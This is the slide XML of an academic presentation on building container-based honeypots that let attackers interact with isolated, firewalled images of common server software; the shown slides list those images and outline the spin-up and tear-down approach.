            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26552963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CDFAA-1EF7-9A4C-96A3-3CE8D401BBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E7E9BC-ACC9-DC4F-B105-0960C4E4FD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WebLogic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DB2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Postgres</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mongo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AAFB4C-FFEA-2948-BAC3-9A1ED3D812C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nginx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Centos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10259BB2-6941-D64E-A023-EC7B602AEC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{822C2128-20F9-AA4F-B636-3926BEF1A097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8089A260-5E7C-6A41-B95B-D3DD7FF9FB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24704235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A7DEF-8B80-F94D-8496-979BA80280D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE353479-A278-154B-94CE-22C5712CC560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spin up containers and let people attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewall for only to/from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t want to allow them to pivot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spin down once they’re done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or after a certain number of commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or after a certain amount of data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4683EA0-110D-B74E-ADE1-AF93C2BB1CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7C7C86-64C4-4E41-BE7E-B9A408C7CC25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{316B7C32-8B21-9949-8860-9AD35DFDA67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17543773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theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="MSU Denver 16x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07DebugValidationCSS" id="{1626C9F5-6FC9-4C4C-BA5C-5BE2F2446A37}" vid="{DA6C36FB-7225-4249-91AD-19FF2DDDC0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MSU Denver 16x9</Template>
  <TotalTime>15206</TotalTime>
  <Words>1292</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>242</Paragraphs>
  <Slides>30</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Menlo</vt:lpstr>
      <vt:lpstr>Nyala</vt:lpstr>
      <vt:lpstr>Plantagenet Cherokee</vt:lpstr>
      <vt:lpstr>MSU Denver 16x9</vt:lpstr>
      <vt:lpstr>Lightweight, Perfect Interaction Honey Pots via Containerization</vt:lpstr>
      <vt:lpstr>Wikipedia</vt:lpstr>
      <vt:lpstr>Why?</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Historic VMs</vt:lpstr>
      <vt:lpstr>Containers</vt:lpstr>
      <vt:lpstr>From docker.com</vt:lpstr>
      <vt:lpstr>Images</vt:lpstr>
      <vt:lpstr>Approach</vt:lpstr>
      <vt:lpstr>No Harm Done</vt:lpstr>
      <vt:lpstr>Two Container Options</vt:lpstr>
      <vt:lpstr>Either way: Pipes</vt:lpstr>
      <vt:lpstr>Pipes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Some Shell Results</vt:lpstr>
      <vt:lpstr>Some Shell Results</vt:lpstr>
      <vt:lpstr>Some Shell Results</vt:lpstr>
      <vt:lpstr>Some HTTP Results</vt:lpstr>
      <vt:lpstr>IIS</vt:lpstr>
      <vt:lpstr>Top 10 Telnet/SSH Credentials</vt:lpstr>
      <vt:lpstr>Total Scans</vt:lpstr>
      <vt:lpstr>Unique IP Addresses</vt:lpstr>
      <vt:lpstr>One Day</vt:lpstr>
      <vt:lpstr>One Week</vt:lpstr>
      <vt:lpstr>One Month</vt:lpstr>
      <vt:lpstr>Project</vt:lpstr>
      <vt:lpstr>Status</vt:lpstr>
      <vt:lpstr>Works in Progress</vt:lpstr>
      <vt:lpstr>Cupboard Under the Stairs</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Beaty</dc:creator>
  <cp:lastModifiedBy>Steve Beaty</cp:lastModifiedBy>
  <cp:revision>64</cp:revision>
  <cp:lastPrinted>2020-11-21T20:50:41Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-21T14:47:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-22T13:59:45Z</dcterms:modified>
</cp:coreProperties>
</file>